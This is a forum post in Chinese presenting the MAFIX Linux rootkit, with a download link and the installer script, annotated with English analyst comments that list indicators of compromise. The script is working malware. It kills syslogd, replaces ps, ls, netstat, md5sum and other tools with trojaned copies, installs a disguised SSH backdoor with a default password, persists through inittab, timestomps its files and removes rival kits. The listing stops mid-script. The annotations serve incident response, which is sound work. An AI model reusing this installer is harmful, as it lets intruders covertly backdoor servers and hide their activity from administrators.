MAFIX - Linux 2.6 rootkit
这后门很贱,服务器中过一次,属于这个后门的改版。那个添加了模块。
下载地址:
https://forum.eviloctal.com/attachment.php?aid=13419
内容:
MAXFIX
---HOW-TO
---mafix
---mafixlibs
---root
下面为root的内容,也就是安装脚本。
#!/bin/bash
######################
# mafix 0.2 #
# fud 2009/07/15 #
######################
# Analyst notes (added for defenders reading this listing):
# This is the installer of the MAFIX rootkit. Everything visible here acts in
# user space: it swaps system binaries, drops a hidden SSH daemon, edits
# /etc/inittab for persistence and tampers with logs. No kernel module is
# loaded by this script.
# Arguments: $1 - backdoor password (falls back to DEFPASS further down)
#            $2 - backdoor port     (falls back to DEFPORT further down)
# The comments added below describe what each stage changes on disk so the
# paths can be used as indicators of compromise during triage.

# Remember the directory the installer was started from.
BASEDIR=`pwd`
# Extend PATH so the system tools used below are found regardless of the
# caller's environment.
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
# Colour codes for the installer's own output. Only CYN, DMAG and RES are
# referenced later in the script; CYN holds the same value as BLK.
# NOTE(review): the ESC byte appears to be lost in this copy (shown as a space,
# or as a literal ^[ on RED) - confirm against an original sample.
BLK=' [1;30m'
MAG=' [1;35m'
CYN=' [1;30m'
RED='^[[1;32m'
DMAG=' [1;37m'
RES=' [0m'
# ASCII-art banner printed to the operator's terminal; no effect on the host.
echo "${CYN} ___ ___ ___ ${DMAG} ${CYN} ___ ${RES}"
echo "${CYN} /__/ / / / / ${DMAG} ___ ${CYN} /__/| ${RES}"
echo "${CYN} | |:: / /:: / /:/_ ${DMAG} / / ${CYN} | |:| ${RES}"
echo "${CYN} | |:|: / /:/: / /:/ / ${DMAG} / /:/ ${CYN} | |:| ${RES}"
echo "${CYN} __|__|:|: / /:/~/:: / /:/ /:/ ${DMAG}/__/:: ${CYN} __|__|:| ${RES}"
echo "${CYN} /__/::::| : /__/:/ /:/: /__/:/ /:/ ${DMAG}__/:__ ${CYN} /__/::::____${RES}"
echo "${CYN} :~~__/ :/:/__/ :/:/ ${DMAG} :/ ${CYN} ~~~::::/${RES}"
echo "${CYN} : ::/ ::/ ${DMAG} __::/${CYN} |~~|:|~~ ${RES}"
echo "${CYN} : : : ${DMAG} /__/:/ ${CYN} | |:| ${RES}"
echo "${CYN} : : : ${DMAG} __/ ${CYN} | |:| ${RES}"
echo "${CYN} __/ __/ __/ ${DMAG} ${CYN} |__|/ ${RES}"
echo "${DMAG}${RES}"
echo "${DMAG}- the ferrari of rootkits - ${RES}"
sleep 5
echo "${CYN}mafix!${DMAG} > ${CYN} extracting libs...${RES}"
# Unpack the bundled payload archive into the current directory. This runs
# before the root check, so an unprivileged run still leaves extracted files.
tar zxf mafixlibs
# Everything after this point needs root (chattr, writes under /bin, /sbin,
# /lib, /etc); the script stops here for any other user.
if [ "$(whoami)" != "root" ]; then
echo "${CYN}mafix!${DMAG} > ${CYN} you need to be root to backdoor the box...${RES}"
exit
fi
cd $BASEDIR
sleep 1
# Log tampering: the local syslog daemon is killed with SIGKILL so the steps
# that follow are not recorded locally. It is started again at the very end of
# the script. Detection: an unexplained gap in local logs, or a syslogd restart
# with no matching admin action.
killall -9 syslogd >/dev/null 2>&1
# startime is recorded here but never read anywhere in this script.
startime=`date +%S`
echo "${CYN}mafix!${DMAG} > ${CYN} backdooring box...${RES}"
# Remote-logging check: take the non-comment, non-empty lines of
# /etc/syslog.conf that contain '@' and keep what follows the '@', i.e. the
# log hosts this machine forwards to. The script only warns its operator about
# them; it does nothing to the remote copies. This is why off-host log
# forwarding is a useful control against this kind of installer.
SYSLOGCONF="/etc/syslog.conf"
REMOTE=`grep -v "^#" "$SYSLOGCONF" | grep -v "^$" | grep "@" | cut -d '@' -f 2`
if [ ! -z "$REMOTE" ]; then
echo "${CYN}mafix!${DMAG} > ${CYN} Remote logging found! I hope you got access to these box:${RES}"
echo
for host in $REMOTE; do
echo -n " "
echo $host
done
echo
echo ' ${CYN}coz this box is logging to it${RES}'
echo
else
echo "${CYN}mafix!${DMAG} > ${CYN} no remote logging found...${RES}"
fi
# File-integrity check: look for a Tripwire installation and for its database
# named after the node name (uname -n).
uname=`uname -n`
twd=/var/lib/tripwire/$uname.twd
if [ -d /etc/tripwire ]; then
echo "${CYN}mafix!${DMAG} > ${CYN} WARNING: TRIPWIRE FOUND!${RES}"
if [ -f /var/lib/tripwire/$uname.twd ]; then
# chattr -isa clears the immutable (i), secure-delete (s) and append-only (a)
# flags. Nothing else in this script touches $twd afterwards.
# Mitigation: keep the integrity baseline off-host or on read-only media.
chattr -isa $twd # drop the protection flags, if any, so the file can be overwritten (chattr +isa would write-protect it)
else
echo "${CYN}mafix!${DMAG} > ${CYN} no tripwire db found...${RES}"
fi
else
echo "${CYN}mafix!${DMAG} > ${CYN} no tripwire was detected..${RES}"
fi
# restoring login
# If /sbin/xlogin exists it is moved back over /bin/login.
# NOTE(review): presumably xlogin is the genuine login binary set aside by an
# earlier login backdoor - not established by this script; confirm.
# Mode 7455 sets the setuid, setgid and sticky bits; +isa then makes the file
# immutable. IoC: /sbin/xlogin, or /bin/login with mode 7455 and the i flag.
if [ -f /sbin/xlogin ]; then
chattr -isa /sbin/xlogin
chattr -isa /bin/login
mv -f /sbin/xlogin /bin/login
chmod 7455 /bin/login
chattr +isa /bin/login
fi
echo "${CYN}mafix!${DMAG} > ${CYN} installing trojans...${RES}"
# Remove a password file left by a previous install; it is rewritten below.
if [ -f /etc/sh.conf ]; then
chattr -isa /etc/sh.conf
rm -rf /etc/sh.conf
fi
# checking if we got needed libs and filez
# Bundled libproc files are dropped into /lib only when the host lacks them.
if [ ! -f /lib/libproc.a ]; then
mv bin/lib/libproc.a /lib/ 2>/dev/null
fi
if [ ! -f /lib/libproc.so.2.0.6 ]; then
mv bin/lib/libproc.so.2.0.6 /lib/ 2>/dev/null
fi
echo "${CYN}mafix!${DMAG} > ${CYN} hold on...${RES}"
# Refresh the dynamic linker cache so the libraries just added are picked up.
/sbin/ldconfig >/dev/null 2>&1
# If the host has no md5sum, the bundled one is installed. touch -acmr copies
# the access and modification times of /bin/ls onto it first (timestomping);
# touch cannot set ctime, so ctime still reflects the real change time.
if [ ! -f /usr/bin/md5sum ]; then
touch -acmr /bin/ls bin/md5sum
cp bin/md5sum /usr/bin/md5sum
fi
# Defaults used when the operator passes no arguments. A listener on this
# default port is worth checking for from a trusted host, since the local
# netstat is replaced further down.
DEFPASS=race
DEFPORT=11111
# Password: $1 if given, otherwise DEFPASS. It is echoed to the terminal in
# clear text and stored in /etc/sh.conf as the output of md5sum, i.e. an
# unsalted MD5 digest. IoC: /etc/sh.conf, root-owned, immutable, with
# timestamps equal to those of /bin/ls.
if test -n "$1" ; then
echo "${CYN}mafix!${DMAG} > ${CYN} Password:${DMAG} $1${RES}"
cd $BASEDIR/bin
echo -n $1|md5sum > /etc/sh.conf # generate the password file
else
echo "${CYN}mafix!${DMAG} > ${CYN} Password:${DMAG} $DEFPASS${RES}"
echo -n $DEFPASS|md5sum > /etc/sh.conf
fi
touch -acmr /bin/ls /etc/sh.conf
chown -f root:root /etc/sh.conf
chattr +isa /etc/sh.conf # write-protect
# Port: $2 if given, otherwise DEFPORT. The port is appended to the bundled
# sshd_config, and two lines ("3 <port>", "4 <port>") are appended to
# bin/headers/hosts.h, which is installed as /usr/include/hosts.h later on.
# NOTE(review): hosts.h is presumably the hide-list read by the replaced
# netstat - its format is not shown on this page; confirm.
# The finished config is renamed to shdcf.
if test -n "$2" ; then
echo "${CYN}mafix!${DMAG} > ${CYN} Port:${DMAG} $2${RES}"
echo "Port $2" >> $BASEDIR/bin/.sh/sshd_config
echo "3 $2" >> $BASEDIR/bin/headers/hosts.h
echo "4 $2" >> $BASEDIR/bin/headers/hosts.h
cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config ; rm -rf $BASEDIR/bin/.sh/shdcf2
mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf 2>/dev/null
else
# Default-port branch. $2 is empty here, so the two hosts.h lines written
# below carry no port number.
echo "${CYN}mafix!${DMAG} > ${CYN} Password:${DMAG} $DEFPORT${RES}"
echo "Port $DEFPORT" >> $BASEDIR/bin/.sh/sshd_config
echo "3 $2" >> $BASEDIR/bin/headers/hosts.h
echo "4 $2" >> $BASEDIR/bin/headers/hosts.h
# NOTE(review): the space inside "$B ASEDIR" is probably an artefact of this
# copy of the script.
cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config ; rm -rf $B ASEDIR/bin/.sh/shdcf2
mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf 2>/dev/null
fi
# Remove files left by an earlier install of the same kit before dropping
# fresh copies. IoC paths: /lib/lidps1.so and /usr/include/{hosts,file,log,
# proc}.h. On a clean system a package-ownership query (rpm -qf / dpkg -S)
# is a quick way to tell whether any package provides them.
# NOTE(review): these look like configuration files for the replaced binaries
# (what to hide); their contents are not shown on this page.
if [ -f /lib/lidps1.so ]; then
chattr -isa /lib/lidps1.so
rm -rf /lib/lidps1.so
fi
if [ -f /usr/include/hosts.h ]; then
chattr -isa /usr/include/hosts.h
rm -rf /usr/include/hosts.h
fi
if [ -f /usr/include/file.h ]; then
chattr -isa /usr/include/file.h
rm -rf /usr/include/file.h
fi
if [ -f /usr/include/log.h ]; then
chattr -isa /usr/include/log.h
rm -rf /usr/include/log.h
fi
if [ -f /usr/include/proc.h ]; then
chattr -isa /usr/include/proc.h
rm -rf /usr/include/proc.h
fi
cd $BASEDIR
# Install the bundled copies, giving each the access/modification times of
# /bin/ls so they do not stand out by date.
mv $BASEDIR/bin/headers/lidps1.so /lib/lidps1.so 2>/dev/null
touch -acmr /bin/ls /lib/lidps1.so # set the file's timestamps to match /bin/ls
touch -acmr /bin/ls $BASEDIR/bin/headers/* # set timestamps
mv $BASEDIR/bin/headers/* /usr/include/ 2>/dev/null
# Ok lets start creating dirs
# Two working directories are created. /lib/libsh.so is a directory despite
# its shared-library name; /usr/lib/libsh is the kit's home directory.
# IoC: a directory at /lib/libsh.so, and /usr/lib/libsh.
SSHDIR=/lib/libsh.so
HOMEDIR=/usr/lib/libsh
# Clear out anything left there by a previous install.
if [ -d /lib/libsh.so ]; then
chattr -isa /lib/libsh.so
chattr -isa /lib/libsh.so/*
rm -rf /lib/libsh.so
fi
if [ -d /usr/lib/libsh ]; then
chattr -isa /usr/lib/libsh
chattr -isa /usr/lib/libsh/*
rm -rf /usr/lib/libsh/*
fi
mkdir $SSHDIR 2>/dev/null
touch -acmr /bin/ls $SSHDIR
mkdir $HOMEDIR 2>/dev/null
touch -acmr /bin/ls $HOMEDIR
cd $BASEDIR/bin
# The bundled .sh/ directory (SSH daemon, its config and keys as far as the
# file names suggest) goes to SSHDIR; its .bashrc goes to HOMEDIR.
mv .sh/* $SSHDIR/ 2>/dev/null
mv .sh/.bashrc $HOMEDIR 2>/dev/null
# Remove earlier copies of the two daemons, whatever attributes they carry.
if [ -f /sbin/ttyload ]; then
chattr -AacdisSu /sbin/ttyload
rm -rf /sbin/ttyload
fi
if [ -f /usr/sbin/ttyload ]; then
chattr -isa /usr/sbin/ttyload
rm -rf /usr/sbin/ttyload
fi
if [ -f /sbin/ttymon ]; then
chattr -isa /sbin/ttymon
rm -rf /sbin/ttymon
fi
# The bundled sshd is installed under the innocuous name /sbin/ttyload, given
# the timestamps of /bin/ls and made immutable; any running instance is killed
# so the new one can take over. IoC: /sbin/ttyload, /sbin/ttymon.
mv $SSHDIR/sshd /sbin/ttyload 2>/dev/null
chmod a+xr /sbin/ttyload 2>/dev/null
chmod o-w /sbin/ttyload 2>/dev/null
touch -acmr /bin/ls /sbin/ttyload
chattr +isa /sbin/ttyload
kill -9 `pidof ttyload` >/dev/null 2>&1
# Same treatment for the second bundled binary, ttymon (its purpose is not
# visible from this script).
mv $BASEDIR/bin/ttymon /sbin/ttymon 2>/dev/null
chmod a+xr /sbin/ttymon 2>/dev/null
touch -acmr /bin/ls /sbin/ttymon
chattr +isa /sbin/ttymon
kill -9 `pidof ttymon` >/dev/null 2>&1
# A copy of the system bash is placed in SSHDIR.
cp /bin/bash $SSHDIR
# INITTAB SHUFFLING
# Persistence: /etc/inittab is rebuilt so that init runs /usr/sbin/ttyload once
# in runlevels 2-5. The new entry is placed under a "# Loading standard ttys"
# comment, directly before the original getty lines, and stock-looking
# commented-out entries are appended so the file reads like a distribution
# default. Detection: diff /etc/inittab against the packaged version and look
# for an id "0" entry pointing at ttyload.
# The temporary files use fixed names in /tmp (/tmp/.init1, /tmp/.init2).
chattr -isa /etc/inittab
cat /etc/inittab |grep -v ttyload|grep -v getty > /tmp/.init1
cat /etc/inittab |grep getty > /tmp/.init2
echo "# Loading standard ttys" >> /tmp/.init1
echo "0:2345:once:/usr/sbin/ttyload" >> /tmp/.init1
cat /tmp/.init2 >> /tmp/.init1
echo "" >> /tmp/.init1
echo "# modem getty." >> /tmp/.init1
echo "# mo:235:respawn:/usr/sbin/mgetty -s 38400 modem" >> /tmp/.init1
echo "" >> /tmp/.init1
echo "# fax getty (hylafax)" >> /tmp/.init1
echo "# mo:35:respawn:/usr/lib/fax/faxgetty /dev/modem" >> /tmp/.init1
echo "" >> /tmp/.init1
echo "# vbox (voice box) getty" >> /tmp/.init1
echo "# I6:35:respawn:/usr/sbin/vboxgetty -d /dev/ttyI6" >> /tmp/.init1
echo "# I7:35:respawn:/usr/sbin/vboxgetty -d /dev/ttyI7" >> /tmp/.init1
echo "" >> /tmp/.init1
echo "# end of /etc/inittab" >> /tmp/.init1
# /usr/sbin/ttyload is a two-line wrapper that starts /sbin/ttyload -q and
# /sbin/ttymon with all output discarded. It is timestomped, made immutable
# and run immediately, so the daemons start without waiting for a reboot.
echo "/sbin/ttyload -q >/dev/null 2>&1" > /usr/sbin/ttyload
echo "/sbin/ttymon >/dev/null 2>&1" >> /usr/sbin/ttyload
touch -acmr /bin/ls /usr/sbin/ttyload
chmod +x /usr/sbin/ttyload 2>/dev/null
chattr +isa /usr/sbin/ttyload
/usr/sbin/ttyload >/dev/null 2>&1
# The rebuilt file inherits the old inittab's access/modification times before
# it replaces it, so mtime alone will not reveal the edit.
touch -amcr /etc/inittab /tmp/.init1
mv -f /tmp/.init1 /etc/inittab 2>/dev/null
rm -rf /tmp/.init2
# MAKING SURE WE GOT IT BACKDORED RIGHT !
# Self-check: warn the operator if the ttyload entry did not make it into
# /etc/inittab.
if [ ! "`grep ttyload /etc/inittab`" ]; then
echo "${CYN}mafix!${DMAG} > ${CYN} inittab broken, sshd wont be loaded upon reboot :(${RES}"
fi
# Say hello to md5sum fixer boys n gurls !
# Before any binary is replaced, the MD5 digests of the genuine tools are
# collected into .shmd5 (the working directory is $BASEDIR/bin at this point).
# NOTE(review): presumably the replaced md5sum answers with these stored
# digests so a local hash check looks clean - that binary is not shown here.
# Consequence for responders: hashes computed on the suspect host with its own
# md5sum cannot be trusted; verify from trusted media or another machine.
if [ -f /sbin/ifconfig ]; then
/usr/bin/md5sum /sbin/ifconfig >> .shmd5
fi
if [ -f /bin/ps ]; then
/usr/bin/md5sum /bin/ps >> .shmd5
fi
if [ -f /bin/ls ]; then
/usr/bin/md5sum /bin/ls >> .shmd5
fi
if [ -f /bin/netstat ]; then
/usr/bin/md5sum /bin/netstat >> .shmd5
fi
if [ -f /usr/bin/find ]; then
/usr/bin/md5sum /usr/bin/find >> .shmd5
fi
if [ -f /usr/bin/top ]; then
/usr/bin/md5sum /usr/bin/top >> .shmd5
fi
if [ -f /usr/sbin/lsof ]; then
/usr/bin/md5sum /usr/sbin/lsof >> .shmd5
fi
if [ -f /usr/bin/slocate ]; then
/usr/bin/md5sum /usr/bin/slocate >> .shmd5
fi
if [ -f /usr/bin/dir ]; then
/usr/bin/md5sum /usr/bin/dir >> .shmd5
fi
if [ -f /usr/bin/md5sum ]; then
/usr/bin/md5sum /usr/bin/md5sum >> .shmd5
fi
# The digest list is passed through the bundled ./encrypt tool and written to
# /dev/srd0, unless a regular file already exists there from an earlier run.
# IoC: a regular file (not a device node) at /dev/srd0.
if [ ! -f /dev/srd0 ]; then
./encrypt -e .shmd5 /dev/srd0
touch -acmr /bin/ls /dev/srd0
chattr a+r /dev/srd0
chown -f root:root /dev/srd0
fi
rm -rf .shmd5
# time change bitch
# Timestomping: each bundled replacement in the working directory receives the
# access and modification times of the system binary it is about to replace.
# mtime therefore survives the swap; ctime and package verification
# (rpm -V, debsums) run from a trusted environment still expose the change.
touch -acmr /sbin/ifconfig ifconfig >/dev/null 2>&1
touch -acmr /bin/ps ps >/dev/null 2>&1
touch -acmr /bin/ls ls >/dev/null 2>&1
touch -acmr /bin/netstat netstat >/dev/null 2>&1
touch -acmr /usr/bin/find find >/dev/null 2>&1
touch -acmr /usr/bin/top top >/dev/null 2>&1
touch -acmr /usr/sbin/lsof lsof >/dev/null 2>&1
touch -acmr /sbin/syslogd syslogd >/dev/null 2>&1
touch -acmr /usr/bin/slocate slocate >/dev/null 2>&1
touch -acmr /usr/bin/dir dir >/dev/null 2>&1
touch -acmr /usr/bin/md5sum md5sum >/dev/null 2>&1
touch -acmr /usr/bin/pstree pstree >/dev/null 2>&1
# Backdoor ps/top/du/ls/netstat/etc..
# Binary replacement. The same four steps repeat for every tool:
#   1. chattr -isa  - clear immutable/secure-delete/append-only flags
#   2. cp to BACKUP - keep the genuine binary in /usr/lib/libsh/.backup
#   3. mv -f        - move the bundled replacement over the system path
#   4. chattr +isa  - make the replacement immutable
# Tools affected: ps, ifconfig, netstat, top, slocate, ls, find, dir, lsof,
# pstree, md5sum - the ones an administrator would use to look for processes,
# sockets and files. Triage should therefore use statically linked tools from
# trusted media, and lsattr to spot the unexpected i/s/a flags on system
# binaries. The .backup directory holds the originals if it is still present.
cd $BASEDIR/bin
BACKUP=/usr/lib/libsh/.backup
mkdir $BACKUP 2>/dev/null
# ps ...
if [ -f /usr/bin/ps ]; then
chattr -isa /usr/bin/ps
cp /usr/bin/ps $BACKUP
mv -f ps /usr/bin/ps 2>/dev/null
chattr +isa /usr/bin/ps
fi
if [ -f /bin/ps ]; then
chattr -isa /bin/ps
cp /bin/ps $BACKUP
mv -f ps /bin/ps 2>/dev/null
chattr +isa /bin/ps
fi
# ifconfig ...
chattr -isa /sbin/ifconfig
cp /sbin/ifconfig $BACKUP
mv -f ifconfig /sbin/ifconfig 2>/dev/null
chattr +isa /sbin/ifconfig
# netstat ...
if [ -f /usr/sbin/netstat ]; then
chattr -isa /usr/sbin/netstat
mv -f netstat /usr/sbin/netstat 2>/dev/null
chattr +isa /usr/sbin/netstat
fi
chattr -isa /bin/netstat
cp /bin/netstat $BACKUP
mv -f netstat /bin/netstat 2>/dev/null
chattr +isa /bin/netstat
# top ...
if [ -f /usr/bin/top ]; then
chattr -isa /usr/bin/top
cp /usr/bin/top $BACKUP
mv -f top /usr/bin/top 2>/dev/null
chattr +isa /usr/bin/top
# A libncurses.so.4 symlink pointing at the host's libncurses.so.5 is created.
# NOTE(review): presumably the bundled top was linked against ncurses 4.
# IoC: /lib/libncurses.so.4 as a symlink not owned by any package.
if [ -f /lib/libncurses.so.5 ]; then
ln -s /lib/libncurses.so.5 /lib/libncurses.so.4 2>/dev/null
fi
if [ -f /usr/lib/libncurses.so.5 ]; then
ln -s /usr/lib/libncurses.so.5 /lib/libncurses.so.4 2>/dev/null
fi
fi
# slocate ...
if [ -f /usr/bin/slocate ]; then
chattr -isa /usr/bin/slocate
cp /usr/bin/slocate $BACKUP
mv -f slocate /usr/bin/slocate 2>/dev/null
chattr +isa /usr/bin/slocate
fi
# ls ...
chattr -isa /bin/ls
cp /bin/ls $BACKUP
mv -f ls /bin/ls 2>/dev/null
chattr +isa /bin/ls
# find ...
if [ -f /usr/bin/find ]; then
chattr -isa /usr/bin/find
cp /usr/bin/find $BACKUP
mv -f find /usr/bin/find 2>/dev/null
chattr +isa /usr/bin/find
fi
# dir ...
if [ -f /usr/bin/dir ]; then
chattr -isa /usr/bin/dir
cp /usr/bin/dir $BACKUP
mv -f dir /usr/bin/dir 2>/dev/null
chattr +isa /usr/bin/dir
fi
# lsof ...
if [ -f /usr/sbin/lsof ]; then
chattr -isa /usr/sbin/lsof
cp /usr/sbin/lsof $BACKUP
mv -f lsof /usr/sbin/lsof 2>/dev/null
chattr +isa /usr/sbin/lsof
fi
# pstree ...
if [ -f /usr/bin/pstree ]; then
chattr -isa /usr/bin/pstree
cp /usr/bin/pstree $BACKUP
mv -f pstree /usr/bin/pstree 2>/dev/null
chattr +isa /usr/bin/pstree
fi
# md5sum ...
# Replaced last, after the genuine digests were collected earlier.
chattr -isa /usr/bin/md5sum
cp /usr/bin/md5sum $BACKUP
mv -f md5sum /usr/bin/md5sum 2>/dev/null
chattr +isa /usr/bin/md5sum
echo "${CYN}mafix!${DMAG} > ${CYN} backdoored some daemons (netstat, ps)${RES}"
# Auxiliary tools are moved into the kit's home directory: shsniff and shp go
# to /usr/lib/libsh/.sniff, shsb and hide to /usr/lib/libsh. All receive the
# timestamps of /bin/ls. Judging by the names these are a sniffer and helper
# utilities; the binaries themselves are not shown on this page.
# IoC: /usr/lib/libsh/.sniff/, /usr/lib/libsh/shsb, /usr/lib/libsh/hide.
cd $BASEDIR
mkdir $HOMEDIR/.sniff 2>/dev/null
mv $BASEDIR/bin/shsniff $HOMEDIR/.sniff/shsniff 2>/dev/null
chmod +x $BASEDIR/bin/sshd 2>/dev/null
mv $BASEDIR/bin/shp $HOMEDIR/.sniff/shp 2>/dev/null
mv $BASEDIR/bin/shsb $HOMEDIR/shsb 2>/dev/null
mv $BASEDIR/bin/hide $HOMEDIR/hide 2>/dev/null
touch -acmr /bin/ls $HOMEDIR/.sniff/shsniff
touch -acmr /bin/ls $HOMEDIR/.sniff/shp
touch -acmr /bin/ls $HOMEDIR/shsb
touch -acmr /bin/ls $HOMEDIR/hide
chmod +x $HOMEDIR/.sniff/* 2>/dev/null
chmod +x $HOMEDIR/shsb 2>/dev/null
chmod +x $HOMEDIR/hide 2>/dev/null
# Runs the bundled bin/sshd helper with the password and port arguments,
# output discarded. This is a different file from .sh/sshd, which was already
# installed as /sbin/ttyload.
./bin/sshd $1 $2 >> /dev/null
echo "${CYN}mafix!${DMAG} > ${CYN} checking for some vuln daemons....${RES}"
# The installer looks for services it considers exploitable (named, wu.ftpd,
# smbd, rpc.statd, an http listener on 443) and tells its operator to patch
# them. Nothing is changed on the host here; it only prints messages. Note that
# ps and netstat are already the replaced versions at this point.
# Fixed-name temp files: /tmp/.procs and /tmp/.stats.
ps aux > /tmp/.procs
if [ "`cat /tmp/.procs | grep named`" ]; then
echo "${CYN}mafix!${DMAG} > ${CYN} NAMED FOUND! PATCH IT!${RES}"
fi
if [ -f /usr/sbin/wu.ftpd ]; then
echo "${CYN}mafix!${DMAG} > ${CYN} WU-FTPD FOUND! PATCH IT!${RES}"
fi
if [ "`cat /tmp/.procs | grep smbd`" ]; then
echo "${CYN}mafix!${DMAG} > ${CYN} SAMBA FOUND! PATCH IT!${RES}"
fi
if [ "`cat /tmp/.procs | grep rpc.statd`" ]; then
echo "${CYN}mafix!${DMAG} > ${CYN} RPC.STATD FOUND! PATCH IT!${RES}"
fi
rm -rf /tmp/.procs
netstat -natp > /tmp/.stats
if [ "`cat /tmp/.stats | grep 443 | grep http`" ]; then
echo "${CYN}mafix!${DMAG} > ${CYN} MOD_SSL FOUND! PATCH IT!${RES}"
fi
rm -rf /tmp/.stats
# CHECKING FOR HOSTILE ROOTKITS/BACKDORS
# The installer evicts other intruders' kits. Directories it recognises are
# moved into /usr/lib/libsh/.owned under the names the script gives them (tk8,
# tk7, bex2, tuxkit); single files are deleted. For a responder this means:
#  - /usr/lib/libsh/.owned may hold evidence of an earlier, separate
#    compromise, including a copied /var/log/tcp.log saved as snifflog;
#  - the paths tested below double as indicators for those other kits.
mkdir $HOMEDIR/.owned 2>/dev/null
if [ -f /etc/ttyhash ]; then
chattr -AacdisSu /etc/ttyhash
rm -rf /etc/ttyhash
fi
if [ -d /lib/ldd.so ]; then
chattr -isa /lib/ldd.so
chattr -isa /lib/ldd.so/*
mv /lib/ldd.so $HOMEDIR/.owned/tk8
echo "${CYN}mafix!${DMAG} > ${CYN} tk8 found and owned!{RES}"
fi
if [ -d /usr/src/.puta ]; then
chattr -isa /usr/src/.puta
chattr -isa /usr/src/.puta/*
mv /usr/src/.puta $HOMEDIR/.owned/tk7
echo "${CYN}mafix!${DMAG} > ${CYN} tk7 found and owned!{RES}"
fi
# /usr/sbin/xntpd and /usr/sbin/nscd are deleted whenever they exist, with no
# check of what they actually are. A legitimately installed nscd at that path
# would be removed too, so a missing nscd binary can be a side effect of this
# installer.
if [ -f /usr/sbin/xntpd ]; then
chattr -isa /usr/sbin/xntpd
rm -rf /usr/sbin/xntpd
fi
if [ -f /usr/sbin/nscd ]; then
chattr -isa /usr/sbin/nscd
rm -rf /usr/sbin/nscd
fi
if [ -d /usr/include/bex ]; then
chattr -isa /usr/info/termcap.info-5.gz; rm -rf /usr/info/termcap.info-5.gz
chattr -isa /usr/include/audit.h; rm -rf /usr/include/audit.h
chattr -isa /usr/include/bex
chattr -isa /usr/include/bex/*
mv /usr/include/bex/ $HOMEDIR/.owned/bex2
if [ -f /var/log/tcp.log ]; then
chattr -isa /var/log/tcp.log
cp /var/log/tcp.log $HOMEDIR/.owned/bex2/snifflog
fi
chattr -isa /usr/bin/sshd2 >/dev/null 2>&1
rm -rf /usr/bin/sshd2 >/dev/null 2>&1
echo "${CYN}mafix!${DMAG} > ${CYN} bex2 found and owned!{RES}"
fi
if [ -d /dev/tux/ ]; then
chattr -isa /usr/bin/xsf >/dev/null 2>&1
rm -rf /usr/bin/xsf >/dev/null 2>&1
chattr -isa /usr/bin/xchk >/dev/null 2>&1
rm -rf /usr/bin/xchk >/dev/null 2>&1
chattr -isa /dev/tux >/dev/null 2>&1
mv /dev/tux $HOMEDIR/.owned/tuxkit
echo "${CYN}mafix!${DMAG} > ${CYN} tuxkit found and owned!{RES}"
fi
if [ -f /usr/bin/ssh2d ]; then
chattr -isa /usr/bin/ssh2d
rm -rf /usr/bin/ssh2d
chattr -isa /lib/security/.config/
chattr -isa /lib/security/.config/*
rm -rf /lib/security/.config
echo "${CYN}mafix!${DMAG} > ${CYN} optickit found and owned!{RES}"
fi
if [ -f /etc/ld.so.hash ]; then
chattr -isa /etc/ld.so.hash
rm -rf /etc/ld.so.hash
fi
# The kit's own two directories are made immutable once everything is in place.
chattr +isa /usr/lib/libsh
chattr +isa /lib/libsh.so
# GREPPING SHITZ FROM rc.sysinit and inetd.conf
# Start-up entries belonging to the evicted kits are filtered out of
# /etc/rc.d/rc.sysinit (xntps / nscd lines) and /etc/inetd.conf (lines
# containing 6635 or 9705). The filtered copy is built in /tmp/.grep and moved
# over the original.
# NOTE(review): the space inside "/us r/sbin/xntps" is probably an artefact of
# this copy of the script.
if [ -f /etc/rc.d/rc.sysinit ]; then
chattr -isa /etc/rc.d/rc.sysinit
cat /etc/rc.d/rc.sysinit | grep -v "# Xntps (NTPv3 daemon) startup.."| grep -v "/us r/sbin/xntps"| grep -v "/usr/sbin/nscd" > /tmp/.grep
chmod +x /tmp/.grep
touch -acmr /etc/rc.d/rc.sysinit /tmp/.grep
mv -f /tmp/.grep /etc/rc.d/rc.sysinit
rm -rf /tmp/.grep
fi
if [ -f /etc/inetd.conf ]; then
chattr -isa /etc/inetd.conf
cat /etc/inetd.conf | grep -v "6635"| grep -v "9705" > /tmp/.grep
# The reference path below is spelled /etc/inted.conf, so the timestamps of the
# real inetd.conf are not copied; after the mv, /etc/inetd.conf carries the
# time of the install. A recent mtime on inetd.conf is a useful timeline clue.
touch -acmr /etc/inted.conf /tmp/.grep
mv -f /tmp/.grep /etc/inetd.conf
rm -rf /tmp/.grep
fi
# KILLING SOME LAMME DAEMONS
# Processes with these names are sent SIGKILL. The list mixes rival backdoors
# and sniffers with ordinary service names (nscd, mountd, lpsched), so
# unexpected service outages at the time of compromise fit this installer.
killall -9 -q nscd >/dev/null 2>&1
killall -9 -q xntps >/dev/null 2>&1
killall -9 -q mountd >/dev/null 2>&1
killall -9 -q mserv >/dev/null 2>&1
killall -9 -q psybnc >/dev/null 2>&1
killall -9 -q t0rns >/dev/null 2>&1
killall -9 -q linsniffer >/dev/null 2>&1
killall -9 -q sniffer >/dev/null 2>&1
killall -9 -q lpsched >/dev/null 2>&1
killall -9 -q sniff >/dev/null 2>&1
killall -9 -q sn1f >/dev/null 2>&1
killall -9 -q sshd2 >/dev/null 2>&1
killall -9 -q xsf >/dev/null 2>&1
killall -9 -q xchk >/dev/null 2>&1
killall -9 -q ssh2d >/dev/null 2>&1
# Host summary printed for the operator: eth0 address, FQDN, one field of
# uname -a, bogomips from /proc/cpuinfo, the address from hostname -i, a count
# of ifconfig lines mentioning "eth", and the distribution release string.
# Read-only apart from the scratch file /tmp/info_tmp.
echo "${CYN}mafix!${DMAG} > ${CYN} sysinfo:${RES}"
MYIPADDR=`/sbin/ifconfig eth0 | grep "inet addr:" | awk -F ' ' ' {print $2} ' | cut -c6-`
echo "${CYN}mafix!${DMAG} > hostname :${CYN} `hostname -f` ($MYIPADDR)${RES}"
uname -a | awk '{ print $11 }' >/tmp/info_tmp
echo "${CYN}mafix!${DMAG} > arch: ${CYN}`cat /tmp/info_tmp` -+- bogomips : `cat /proc/cpuinfo | grep bogomips | awk ' {print $3}'` '${RES}"
echo "${CYN}mafix!${DMAG} > alternative ip: ${CYN} "`hostname -i`" -+- Might be ["`/sbin/ifconfig | grep eth | wc -l`" ] active adapters.${RES}"
if [ -f /etc/redhat-release ]; then
